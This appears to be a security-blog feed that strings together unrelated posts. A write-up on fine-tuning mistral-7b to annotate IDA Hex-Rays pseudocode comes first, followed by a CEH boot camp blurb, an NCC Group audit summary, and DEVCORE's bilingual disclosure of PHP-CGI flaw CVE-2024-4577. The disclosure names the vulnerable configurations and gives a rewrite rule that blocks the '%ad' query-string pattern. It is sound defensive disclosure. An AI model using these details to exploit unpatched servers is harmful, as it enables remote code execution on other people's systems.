With the exact format needed for training identified, the next problem is that we really need thousands of these examples, ideally with high quality responses. I had considered trying to manually create the required dataset using tree-sitter to rewrite valid code with generic variable names while sourcing the function description from documentation, this sounded painful, and I wanted the machine to do the hard work for me. Looking at earlier work done by Stanford for the Alpaca project (https://crfm.stanford.edu/2023/03/13/alpaca.html) I decided to try the same style of approach. The basic idea of this workflow is to use a LLM to build your dataset based on a smaller dataset, or in this case an incomplete dataset and train against that:

After some noodling around I came up with the following high-level process:

  • compile libc with full debug/symbol information
  • load the compiled libraries into IDA and export all functions Hex-Rays output into individual files by address
  • strip the compiled libraries and repeat the previous step, exporting all functions Hex-Rays output into a new set of files

This process creates two directories with matching files:

/symbol/0x2d7f4.c
/stripp/0x2d7f4.c

In this case the file /symbol/0x2d7f4.c contains:

void __fastcall setname(int category, const char *name)
{
  char *v3; // r0

  v3 = (char *)nl_global_locale.__names[category];
  if ( v3 != name )
  {
    if ( v3 != "C" )
      j___GI___libc_free(v3);
    nl_global_locale.__names[category] = name;
  }
}

And the file /stripp/0x2d7f4.c contains:

char *__fastcall sub_2D7F4(int a1, char **a2)
{
  char *result; // r0

  result = (char *)off_170C10[a1 + 16];
  if ( result != (char *)a2 )
  {
    if ( result != "C" )
      result = (char *)j_free();
    off_170C10[a1 + 16] = a2;
  }
  return result;
}

With the two sets of data, the next stage of processing is to generate the dataset records. At a high-level this process looks like the following:

  • using the previously created mistral-7b configuration, query using the symbol/debug Hex-Rays output to get a reasonable quality output
  • create a dataset entry by combining the matching STRIPPED Hex-Rays output with the generated output from the symbol/debug Hex-Rays
  • iterate over all the files until complete

After completing this step we have a large completed instruction-following dataset we can use to fine tune against.

Heavy Customization

There are quite a few options when it comes to carrying out a fine tune of a LLM, at the time of this research project I chose to use unsloth. The following projects are also popular and most likely more batteries-included:

I went with unsloth for a few reasons, the main reason being underlying code has been tuned to provide a large performance increase (speed/memory usage), also it seemed less likely to abstract or hide parts of the training process that may be useful to see or understand. The unsloth project also provides a Jupyter notebook that can be executed on the Google Colab free tier if you do not have hardware (works perfectly!) - I ended up conducting training on a local Linux host with an NVIDIA 3090. To give an idea of performance, the free Colab tier took 21 minutes while my 3090 executed the same training in 7 minutes. Refer to the unsloth repository for install instructions, at the time of this project the installation using conda looked like the following:

conda create --name unsloth_env python=3.10
conda activate unsloth_env
conda install cudatoolkit xformers bitsandbytes pytorch pytorch-cuda=12.1 -c pytorch -c nvidia -c xformers -c conda-forge -y
pip install "unsloth[conda] @ git+https://github.com/unslothai/unsloth.git"

The script used for training was adopted from the examples provided by unsloth, the script uses Hugging Face's Supervised Fine-tuning Trainer (SFT) from the Transformer Reinforcement Learning (TRL) library:

from unsloth import FastLanguageModel
import torch,sys

model = sys.argv[1]
steps = int(sys.argv[2])
training_data = sys.argv[3]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

model = FastLanguageModel.get_peft_model(
    model,
    r = 32, # Choose any number > 0 ! Suggested 8, 16, 32, 64, 128 - r/rank is how strong you want your training to apply
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
                      "gate_proj", "up_proj", "down_proj",],
    lora_alpha = 16, # alpha is a multiplier against r/rank 
    lora_dropout = 0, # Supports any, but = 0 is optimized
    bias = "none",    # Supports any, but = "none" is optimized
    use_gradient_checkpointing = True,
    random_state = 3407,
    use_rslora = False,  # We support rank stabilized LoRA
    loftq_config = None, # And LoftQ
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files=training_data, split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)


from trl import SFTTrainer
from transformers import TrainingArguments

trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = dataset,
    dataset_text_field = "text",
    max_seq_length = max_seq_length,
    dataset_num_proc = 2,
    packing = False, # Can make training 5x faster for short sequences.
    args = TrainingArguments(
        per_device_train_batch_size = 4,
        gradient_accumulation_steps = 4,
        warmup_steps = 5,
        max_steps = steps,
        learning_rate = 2e-4,
        fp16 = not torch.cuda.is_bf16_supported(),
        bf16 = torch.cuda.is_bf16_supported(),
        logging_steps = 1,
        optim = "adamw_8bit",
        weight_decay = 0.01,
        lr_scheduler_type = "linear",
        seed = 3407,
        output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50
    ),
)

gpu_stats = torch.cuda.get_device_properties(0)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
max_memory = round(gpu_stats.total_memory / 1024 / 1024 / 1024, 3)
print(f"GPU = {gpu_stats.name}. Max memory = {max_memory} GB.")
print(f"{start_gpu_memory} GB of memory reserved.")

# execute the actual training
trainer_stats = trainer.train()

used_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
used_memory_for_lora = round(used_memory - start_gpu_memory, 3)
used_percentage = round(used_memory         /max_memory*100, 3)
lora_percentage = round(used_memory_for_lora/max_memory*100, 3)
print(f"{trainer_stats.metrics['train_runtime']} seconds used for training.")
print(f"{round(trainer_stats.metrics['train_runtime']/60, 2)} minutes used for training.")
print(f"Peak reserved memory = {used_memory} GB.")
print(f"Peak reserved memory for training = {used_memory_for_lora} GB.")
print(f"Peak reserved memory % of max memory = {used_percentage} %.")
print(f"Peak reserved memory for training % of max memory = {lora_percentage} %.")

model.save_pretrained(f"lora_model_{steps}") # Local saving

# Just LoRA adapters
if True: model.save_pretrained_merged(f"model_{steps}", tokenizer, save_method = "lora",)

# Save to q4_k_m GGUF
if True: model.save_pretrained_gguf(f"model_{steps}", tokenizer, quantization_method = "q4_k_m")

The script also defines the following items:

output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50

This configuration will save a copy of the fine-tuned weights every 50 steps to a directory outputs - this is helpful for a few reasons. The first being if an error occurs at some point (crash/power/etc.) you have checkpoints you can restart your training from, the second being it allows you to effectively evaluate how well your training is working by comparing each saved checkpoint. While it may seem at first, more steps are better, this is going to be dependent on how large your dataset is and which settings you have configured - more is not always better.

Running this script to fine tune mistral-7b-instruct for 100 steps using the dataset we created would look like the following example output:

$ python training/train.py unsloth/mistral-7b-instruct-v0.2-bnb-4bit 100 ./dataset.json
==((====))==  Unsloth: Fast Mistral patching release 2024.2
   \\   /|    GPU: NVIDIA GeForce RTX 3090. Max memory: 23.691 GB. Platform = Linux.
O^O/ \_/ \    Pytorch: 2.2.0. CUDA = 8.6. CUDA Toolkit = 12.1.
\        /    Bfloat16 = TRUE. Xformers = 0.0.24. FA = False.
 "-____-"     Free Apache license: http://github.com/unslothai/unsloth
/mnt/new/unsloth/lib/python3.10/site-packages/transformers/quantizers/auto.py:155: UserWarning: You passed `quantization_config` or equivalent parameters to `from_pretrained` but the model you're loading already has a `quantization_config` attribute. The `quantization_config` from the model will be used.
  warnings.warn(warning_msg)
Unsloth 2024.2 patched 32 layers with 32 QKV layers, 32 O layers and 32 MLP layers.
Detected kernel version 5.4.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.
GPU = NVIDIA GeForce RTX 3090. Max memory = 23.691 GB.
4.676 GB of memory reserved.
==((====))==  Unsloth - 2x faster free finetuning | Num GPUs = 1
   \\   /|    Num examples = 2,897 | Num Epochs = 3
O^O/ \_/ \    Batch size per device = 4 | Gradient Accumulation steps = 4
\        /    Total batch size = 16 | Total steps = 500
 "-____-"     Number of trainable parameters = 83,886,080
{'loss': 1.4802, 'grad_norm': 1.6030948162078857, 'learning_rate': 4e-05, 'epoch': 0.01}
{'loss': 1.4201, 'grad_norm': 1.4948327541351318, 'learning_rate': 8e-05, 'epoch': 0.01}
{'loss': 1.5114, 'grad_norm': 1.6689960956573486, 'learning_rate': 0.00012, 'epoch': 0.02}
{'loss': 1.1665, 'grad_norm': 0.9258238673210144, 'learning_rate': 0.00016, 'epoch': 0.02}
{'loss': 0.9282, 'grad_norm': 0.6133134961128235, 'learning_rate': 0.0002, 'epoch': 0.03}
{'loss': 0.9292, 'grad_norm': 0.6610234975814819, 'learning_rate': 0.0001995959595959596, 'epoch': 0.03}
{'loss': 0.7517, 'grad_norm': 0.4809339940547943, 'learning_rate': 0.0001991919191919192, 'epoch': 0.04}
{'loss': 0.7554, 'grad_norm': 0.6171303987503052, 'learning_rate': 0.00019878787878787878, 'epoch': 0.04}
{'loss': 0.606, 'grad_norm': 0.564286470413208, 'learning_rate': 0.00019838383838383837, 'epoch': 0.05}
{'loss': 0.6274, 'grad_norm': 0.414183109998703, 'learning_rate': 0.000197979797979798, 'epoch': 0.06}
{'loss': 0.6402, 'grad_norm': 0.3489008843898773, 'learning_rate': 0.0001975757575757576, 'epoch': 0.06}
{'loss': 0.596, 'grad_norm': 0.28150686621665955, 'learning_rate': 0.0001971717171717172, 'epoch': 0.07}
{'loss': 0.5056, 'grad_norm': 0.3132913410663605, 'learning_rate': 0.00019676767676767677, 'epoch': 0.07}
{'loss': 0.5384, 'grad_norm': 0.27469128370285034, 'learning_rate': 0.00019636363636363636, 'epoch': 0.08}
{'loss': 0.5744, 'grad_norm': 0.360963374376297, 'learning_rate': 0.00019595959595959596, 'epoch': 0.08}
{'loss': 0.5907, 'grad_norm': 0.3328467011451721, 'learning_rate': 0.00019555555555555556, 'epoch': 0.09}
{'loss': 0.5067, 'grad_norm': 0.2794954478740692, 'learning_rate': 0.00019515151515151516, 'epoch': 0.09}
{'loss': 0.5563, 'grad_norm': 0.2907596528530121, 'learning_rate': 0.00019474747474747476, 'epoch': 0.1}
{'loss': 0.5533, 'grad_norm': 0.34755516052246094, 'learning_rate': 0.00019434343434343435, 'epoch': 0.1}

After training is complete, I used a small script to evaluate how each checkpoint performs. To do this I take the first 10 entries from the training dataset and use the instruction and input values to generate a new output, as well as generating a new output using an input that was not in the original dataset:

from unsloth import FastLanguageModel
import torch,sys

model_name_input = sys.argv[1]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model_name_input,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    # token = "hf_...", # use one if using gated models like meta-llama/Llama-2-7b-hf
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files="data.json", split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)

FastLanguageModel.for_inference(model)
# do x evals of items from the dataset before training
samples = []
sample_size = 10
for x in range(0,sample_size):
    instruction = dataset[x]["instruction"]
    input       = dataset[x]["input"]
    output      = ''
    text = alpaca_prompt.format(instruction, input, output) #+ EOS_TOKEN
    sample = tokenizer([text],return_tensors = "pt").to("cuda")
    out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
    out = tokenizer.batch_decode(out)
    samples.append(out[0])

# new one not in your dataset goes here
code = '''int __fastcall sub_75C80(int a1, int a2)
{
  int result; // r0
  _DWORD *i; // r3

  result = a2 - *(_DWORD *)(a1 + 12);
  for ( i = *(_DWORD **)(a1 + 48); i; i = (_DWORD *)*i )
  {
    if ( i[2] < result )
      result = i[2];
  }
  return result;
}'''

text = alpaca_prompt.format(instruction, code, output)
sample = tokenizer([text],return_tensors = "pt").to("cuda")
out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
out = tokenizer.batch_decode(out)
samples.append(out[0])

print('Capturing pre training generation samples')
with open(f'results/eval_log_{model_name_input.replace("/","_")}','w') as log:
    for r in samples:
        log.write(r)

For running the script, it seemed easiest to just iterate over the checkpoints in outputs using bash:

for m in $(ls outputs); do python eval.py outputs/$m; done

Results?

So, with training out of the way, the question is, does it work? Initial testing was performed against the following input:

### Instruction:
Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.

### Input:
int __fastcall sub_B0D04(int a1, int a2)
{
  unsigned int v2; // r4
  int result; // r0

  v2 = a1 + a2;
  if ( __CFADD__(a1, a2) )
    return 0;
  result = _libc_alloca_cutoff();
  if ( v2 <= 0x1000 )
    return result | 1;
  return result;
}

As expected, the base model did not follow the requested format very well and the function comment is low quality. At 50 training steps, the model 'understands' the expected output and matches perfectly - the somewhat surprising result is that function comment is better at 50 steps compared to 100 steps.

Zooming out a bit and comparing further steps, the format is perfect while the most common error seen is confusion on what gets returned (value vs allocated memory) or inconsistent numeric format (1000 vs 0x1000):

The real check is, how does this compare to the big models...

It is interesting to see that GPT3.5 is no better than our results and in fact performs worse than our 50-step results, failing into the same error as the 100-step result.

Comparing against GPT3.5 feels slightly unfair as it is quite old, what about GPT4?

Well… that result definitely makes this whole exercise feel painful and pointless. The quality of the comment is much higher, and it also captured more variable renames. So, the end result is: just use GPT4, using a small local model is pointless.

Admitting Defeat and Using GPT4

So now that we tried our best with our small model, we can move on and just use GPT4, just not in the way you would expect. Going back and considering the Alpaca project, they call out using an existing strong language model to automatically generate instruction data, while so far we have used our small 7b parameter model to generate instruction data. This is where we step back slightly and redo some of our previous work, replace our 'low quality' generated data with 'high quality' values from the current leading model.

Using the OpenAI playground is fairly simple to set up an 'assistant' with our instructions:

With the configuration working as expected, its straight forward to use the API and execute the same original instruction generation we previously had done:

I originally had no expectations related to the cost of this process, to be safe I added 50$ to my account before executing the previous step, I was surprised when it only cost ~16$ at the time:

Seeing that it only cost 16$ for the initial run and the quality of the responses were good, I figured why not use both sets of data and get 2x the high-quality instruction datasets?

With the brand-new high-quality dataset complete we can back up and start a new fine tune of our mistral-7b model, in this case it has been trained for 200 steps taking snapshots every 50 steps. After training is complete, an evaluation was done against a new input that is not in either dataset against our old 'low-quality' fine tune and our new one.

At 50 steps the new GPT4 trained version has already performed much better at capturing variables to rename, interestingly the LLM trained dataset description contains more direct references to the code while the GPT4 description is slightly higher level:

At 100 steps the variable names for the GPT4 trained model are slightly better and the description is slightly more technical, referring to specific items within the code. The LLM trained model has picked up the extra variable renames, but they look to be in line with what the GPT4 trained model had at 50 steps. I also thought it was interesting that the LLM trained model refers to [2] as the third field (mathematically correct):

At 150 steps the GPT4 trained model has slightly improved the function description while maintaining the variable renames. The LLM trained model has improved the function name to match the GPT4 trained model at 50 steps, while losing variable renames - interestingly it now refers to [2] as the second element now:

Finally, at 200 steps the GPT4 trained model has slightly tweaked its description. The LLM trained model has rediscovered its variable renames from the 100 steps version and also refined how it references the [2] within the code:

Clearly the mistral-7b model fine-tuned against the high-quality dataset from GPT4 performs much better than the previous version. The real test is to now compare it with GPT4 directly......

That response looks like something we have seen already, at this point I would say we have proven it is feasible to fine tune a small local model to perform a specific task at the level of a much larger model.

Making Friends

So now that we have our fine-tuned local model, we need to hook it into IDA and feed it some Hex-Rays. There are a few other plugins that offer similar functionality:

I decided to write my own simple version, apologies in advance for any errors or poor design decisions, the underlying fine-tuned model is available to use with whatever you like best. Building off the previous simple python script shown earlier, I again choose to use Ollama's rest service instead of loading the model directly - I like this design for few reasons:

  • minimal Python requirements
  • the service can be running on a remote machine with more compute
  • reload/maintenance/update will not interrupt your weeks long IDA session
  • avoids tying IDA up with a large memory footprint, that one you have had running for weeks now :)

To set up Ollama to use the new model, download the weights and Modelfile in the same directory and configure Ollama:

% ollama create aidapal -f aidapal.modelfile
transferring model data
using existing layer sha256:d8ff55be57629cfb21d60d4977ffb6c09071104d08bce8b499e78b10481b0a3a
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
using existing layer sha256:0c3d95e257e4029eb818625dbf1627a4ca182eefcdbc360d75c108afda3cf458
using existing layer sha256:3da0ba8b21dda1aba779a536319f87fbed8ee78e80b403ce2c393cec6d58e1a9
creating new layer sha256:5fe21ec0a43781478cefd5a2b4b047651c889e08f1d7e4bf7e8bc5a7413e425a
writing manifest
success

Loading the plugin can be done through the IDA menu (File->Script File). After loading, the script provides a new context menu option when right-clicking within a Hex-Rays window:

In this example the plugin has been configured with a single model, if you have other models loaded within your Ollama service they can be added and will appear within the context menu as well. After activating the menu item, the plugin will query the selected model with the Hex-Rays code and return a dialog when it is complete:

Within this dialog all returned values can be accepted individually by selecting the checkbox (enabled by default) and clicking Accept, clicking Cancel will reject all and close the dialog.

In this example, the results are accepted and applied fully:

This example shows rejecting the function name and description, only applying the variable renames:

There is also nothing stopping you from accepting all changes multiple times:

Another consideration I had when creating aiDAPal was implementing some form of data lookup like Retrieval Augmented Generation (RAG), but in the spirit of keeping things simple I came up with the idea of treating the IDA database (IDB) as a lookup/knowledge base. The basic idea is whenever the plugin is activated, it will identify any references within the code that is being analyzed and retrieve any comments that exist at the target locations and include them as a multi-line comment before the function that is sent for analysis. An example of this workflow can be seen in the following image:

For this example, the WDT_ICR register location is queried for any comments, if one exists it gets extracted and included in our request. Something to consider is that in this case, the WDT_ICR register is common and is part of the 'base knowledge' stored within the original trained weights and would have be identified fine without the extra comment. This can be confirmed by querying the underlying model for this information:

% ollama run mistral:7b
>>> give me a single sentence description of the WDT_ICR register
 The WDT_ICR (Watchdog Timer Independent Counter Register) is a control register in the watchdog timer unit that triggers a reset upon being written, allowing configuring the watchdog timer's independent counter.

By using the IDB as an extra source of knowledge as shown previously, we can use our own information/knowledge to better guide the response. In the following image the comment associated with the WDT_ICR register has been changed, resulting in the model returning a different result that considers the additional knowledge that was provided by the IDB:

Currently, this functionality does not extract this information from comments that may be defined at the start of a function; while that would be useful and give context to the current analysis as to what a called function does, this would often result the inclusion of a large number of extra tokens potentially exhausting the underlying models context window and return low quality results.

The End?

While I am sure I made mistakes along the way, I hope this information is helpful to anyone wanting to fine-tune a LLM for local usage; whether that is making a better version of the one we are sharing or something completely different. It is also worth noting most of this project was executed earlier this year (feb/march), since then a handful of new models have been released that would be interesting to explore/adapt this research to (phi3-med/llama3/Codestral). If you made it this far, thanks for reading.

All files related to this project can be found on our GitHub (https://github.com/atredispartners/aidapal).

Inside a CEH boot camp: Advice from an Infosec instructor

By: Infosec
6 June 2024 at 18:00

Infosec and the Cyber Work Hacks podcast are here to help you pass the Certified Ethical Hacker (CEH) exam! So for today’s hack, we’re talking about bootcamps. The CEH exam, no matter how you slice it, is an exam that is the definition of the phrase, “It’s a marathon, not a sprint.” With 125 questions and four hours to answer them, there’s as much of a mental game at work here that’s much more than rote memorization of terms and tools. That’s why I wanted to get an insider’s look from Infosec boot camp instructor Akyl Phillips! Phillips will explain what the Infosec five-day CEH boot camp is like, the learning and retention strategies you’ll employ, and all the ways that bootcamp training can help you pass on the first try. Phillips has taught pentesters and red teamers at all levels from sheer beginners to people already in the field, and this episode is a look into how it works. Book yourself a front-row seat for another Cyber Work Hack.

0:00 - How to pass the CEH exam
3:17 - What is a CEH boot camp?
4:02 - Things to know before the CEH exam
5:30 - How does the CEH exam test practical skills?
6:46 - The day-to-day of an Infosec boot camp
11:08 - What is CEH exam day like?
12:14 - Is a cybersecurity boot camp right for me?
13:12 - Outro

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

Public Report – Keyfork Implementation Review

By: R.Rivera
6 June 2024 at 15:28

In April 2024, Distrust engaged NCC Group’s Cryptography Services team to perform a cryptographic security assessment of keyfork, described as “an opinionated and modular toolchain for generating and managing a wide range of cryptographic keys offline and on smartcards from a shared mnemonic phrase”. The tool is intended to be run on an air-gapped system and allows a user to split or recover a cryptographic key using Shamir Secret Sharing, with shares imported and exported using mechanisms such as mnemonics or QR codes. These shares can be managed by one or more users, with a defined threshold of shares required to recover the original secret. A retest was conducted in May 2024, which resulted in all findings and notes being marked Fixed.

The review targeted the tagged release keyfork-v0.1.0 of the keyfork repository. Distrust indicated that memory-related (e.g., zeroization) and timing-related attacks were not a concern due to the trusted nature of the hardware and its environment, and as such were not investigated in detail.

Several engagement notes and several low impact findings were uncovered, each of which were promptly addressed by Distrust.

資安通報:PHP 遠端程式碼執行 (CVE-2024-4577) - PHP CGI 參數注入弱點

5 June 2024 at 16:00

English Version, 中文版本

戴夫寇爾研究團隊在進行前瞻攻擊研究期間,發現 PHP 程式語言存在遠端程式碼執行弱點,基於 PHP 在網站生態使用的廣泛性以及此弱點之易重現性,研究團隊將此弱點標記為嚴重、並在第一時間回報給 PHP 官方。官方已在 2024/06/06 發佈修復版本,詳細時程可參閱漏洞回報時間軸

漏洞描述

PHP 程式語言在設計時忽略 Windows 作業系統內部對字元編碼轉換的 Best-Fit 特性,導致未認證的攻擊者可透過特定的字元序列繞過舊有 CVE-2012-1823 的保護;透過參數注入等攻擊在遠端 PHP 伺服器上執行任意程式碼。

影響範圍

此弱點影響安裝於 Windows 作業系統上所有的 PHP 版本,詳情可參照下表:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

由於 PHP 8.0 分支、PHP 7 以及 PHP 5 官方已不再維護,網站管理員可參考如何確認自己易遭受攻擊章節,並於修補建議找到暫時緩解措施。

如何確認自己易遭受攻擊?

對於常見之 Apache HTTP Server 加上 PHP 組合,網站管理員可透過此文章列出之兩個方式確認伺服器是否易被攻擊。其中,情境二也是 XAMPP for Windows 安裝時的預設設定,因此所有版本的 XAMPP for Windows 安裝也預設受此弱點影響。

在本文撰寫當下已驗證當 Windows 作業系統執行於下列語系時,未授權的攻擊者可直接在遠端伺服器上執行任意程式碼:

  • 繁體中文 (字碼頁 950)
  • 簡體中文 (字碼頁 936)
  • 日文 (字碼頁 932)

對於其它執行在英文、韓文、西歐語系之 Windows 作業系統,由於 PHP 使用情境廣泛、暫無法完全列舉並排除其利用情境,因此還是建議使用者全面盤點資產、確認使用情境並更新 PHP 至最新版本確保萬無一失!

情境一: 將 PHP 設定於 CGI 模式下執行

在 Apache Httpd 設定檔中透過 Action 語法將對應的 HTTP 請求交給 PHP-CGI 執行檔處理時,受此弱點影響,常見設定包含但不限於:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

情境二: 將 PHP 執行檔暴露在外 (XAMPP 預設安裝設定)

即使未設定 PHP 於 CGI 模式下執行,僅將 PHP 執行檔暴露在 CGI 目錄下也受此弱點影響,常見情況包含但不限於:

  1. php.exephp-cgi.exe 複製到 /cgi-bin/ 目錄中
  2. 將 PHP 安裝目錄透過 ScriptAlias 暴露到外,如:
     ScriptAlias /php-cgi/ "C:/xampp/php/"
    

修補建議

強烈建議所有使用者升級至 PHP 官方最新版本 8.3.88.2.208.1.29,對於無法升級的系統可透過下列方式暫時緩解弱點。

除此之外,由於 PHP CGI 已是一種過時且易於出現問題的架構,也建議評估遷移至較為安全的 Mod-PHP、FastCGI 或是 PHP-FPM 等架構可能性。

1. 對無法更新 PHP 的使用者

可透過下列 Rewrite 規則阻擋攻擊,請注意此份規則只作為繁體中文、簡體中文及日文語系中的暫時性緩解機制,實務上仍建議更新到已修復版本或更改架構。

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

2. 對 XAMPP for Windows 使用者

在撰寫本文的當下,XAMPP 尚未針對此漏洞釋出相對應的更新安裝檔,如確認自身的 XAMPP 並無使用到 PHP CGI 之功能,可透過修改下列 Apache Httpd 設定檔以避免暴露在弱點中:

C:/xampp/apache/conf/extra/httpd-xampp.conf

找到相對應的設定行數:

ScriptAlias /php-cgi/ "C:/xampp/php/"

並將其註解:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

漏洞回報時間軸

  • 2024/05/07 - DEVCORE 透過 PHP 官方弱點通報頁面回報此問題。
  • 2024/05/07 - PHP 開發者確認弱點並強調要盡快修復。
  • 2024/05/16 - PHP 開發者釋出第一版修復並尋求建議。
  • 2024/05/18 - PHP 開發者釋出第二版修復並尋求建議。
  • 2024/05/20 - PHP 進入新版本發布準備。
  • 2024/06/06 - PHP 發布新版本 8.3.88.2.208.1.29

參考資料

Security Alert: CVE-2024-4577 - PHP CGI Argument Injection Vulnerability

5 June 2024 at 16:00

English Version, 中文版本

During DEVCORE’s continuous offensive research, our team discovered a remote code execution vulnerability in PHP. Due to the widespread use of the programming language in the web ecosystem and the ease of exploitability, DEVCORE classified its severity as critical, and promptly reported it to the PHP official team. The official team released a patch on 2024/06/06. Please refer to the timeline for disclosure details.

Description

While implementing PHP, the team did not notice the Best-Fit feature of encoding conversion within the Windows operating system. This oversight allows unauthenticated attackers to bypass the previous protection of CVE-2012-1823 by specific character sequences. Arbitrary code can be executed on remote PHP servers through the argument injection attack.

Impact

This vulnerability affects all versions of PHP installed on the Windows operating system. Please refer to the table below for details:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

Since the branch of PHP 8.0, PHP 7, and PHP 5 are End-of-Life, and are no longer maintained anymore, server admins can refer to the Am I Vulnerable section to find temporary patch recommendations in the Mitigation Measure section.

Am I Vulnerable?

For the usual case of combinations like Apache HTTP Server and PHP, server administrators can use the two methods listed in this article to determine whether their servers are vulnerable or not. It’s notable to address that Scenario-2 is also the default configuration for XAMPP for Windows, so all versions of XAMPP installations on Windows are vulnerable by default.

As of this writing, it has been verified that when the Windows is running in the following locales, an unauthorized attacker can directly execute arbitrary code on the remote server:

  • Traditional Chinese (Code Page 950)
  • Simplified Chinese (Code Page 936)
  • Japanese (Code Page 932)

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

Scenario 1: Running PHP under CGI mode

When configuring the Action directive to map corresponding HTTP requests to a PHP-CGI executable binary in Apache HTTP Server, this vulnerability can be exploited directly. Common configurations affected include, but are not limited to:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

Or

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

Scenario 2: Exposing the PHP binary (also the default XAMPP configuration)

Even if PHP is not configured under the CGI mode, merely exposing the PHP executable binary in the CGI directory is affected by this vulnerability, too. Common scenarios include, but are not limited to:

  1. Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.
  2. Exposing the PHP directory via ScriptAlias directive, such as:
     ScriptAlias /php-cgi/ "C:/xampp/php/"
    

Mitigation Measure

It is strongly recommended that all users upgrade to the latest PHP versions of 8.3.8, 8.2.20, and 8.1.29. For systems that cannot be upgraded, the following instructions can be used to temporarily mitigate the vulnerability.

However, since PHP CGI is an outdated and problematic architecture, it’s still recommended to evaluate the possibility of migrating to a more secure architecture such as Mod-PHP, FastCGI, or PHP-FPM.

1. For users who cannot upgrade PHP:

The following Rewrite Rules can be used to block attacks. Please note that these rules are only a temporary mitigation for Traditional Chinese, Simplified Chinese, and Japanese locales. It is still recommended to update to a patched version or migrate the architecture in practice.

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

2. For users who use XAMPP for Windows:

XAMPP has not yet released corresponding update files for this vulnerability at the time of writing this article. If you confirm that you do not need the PHP CGI feature, you can avoid exposure to the vulnerability by modifying the following Apache HTTP Server configuration:

C:/xampp/apache/conf/extra/httpd-xampp.conf

Locating the corresponding lines:

ScriptAlias /php-cgi/ "C:/xampp/php/"

And comment it out:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

Timeline

  • 2024/05/07 - DEVCORE reported this issue through the official PHP vulnerability disclosure page.
